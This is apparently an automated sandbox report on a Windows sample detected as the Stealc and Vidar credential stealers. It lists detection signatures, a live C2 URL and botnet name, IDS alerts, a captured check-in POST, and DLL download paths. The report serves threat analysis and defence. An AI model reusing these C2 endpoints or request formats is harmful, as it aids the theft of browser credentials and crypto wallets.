Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1541120
MD5:	37f84f1ce614d05fdd3bd682b3815785
SHA1:	32b380d6e0f64eefbc758810cc6108ee0911617b
SHA256:	591adf3f95801872770c31f408cd3b34eb1fcef8b6eb4c9c4d9623b36f5c0f38
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 37F84F1CE614D05FDD3BD682B3815785)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2151981046.0000000004B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 6432	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6432	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6432	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.ab0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:04.018387+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.6	49711	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:04.011599+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49711	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:04.299760+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49711	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:05.656800+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49711	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:04.307986+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.6	49711	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:03.724481+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49711	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:02:06.169114+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:13.870585+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:15.958196+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:17.270664+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:18.286324+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:20.343684+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:20.815179+0200	2803304	3	Unknown Traffic	192.168.2.6	49711	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 38 38 45 39 42 41 30 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"AB88E9BA03AD2322695909------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--

Source: file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllP
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllf
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll563c6670f193.php
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll8
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllF
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllp
Source: file.exe, 00000000.00000002.2426216663.0000000000612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2451471654.0000000029222000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllV
Source: file.exe, 00000000.00000002.2426216663.0000000000612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlljo
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll$
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll4
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll:$
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/N?
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/Q?D
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4%
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCl&
Source: file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX%
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpata
Source: file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdlld
Source: file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phplS
Source: file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phprowser
Source: file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx&
Source: file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37r
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2456512348.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://support.mozilla.org
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://www.mozilla.org
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CB3B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3B8C0 rand_s,NtQueryVirtualMemory,	0_2_6CB3B8C0
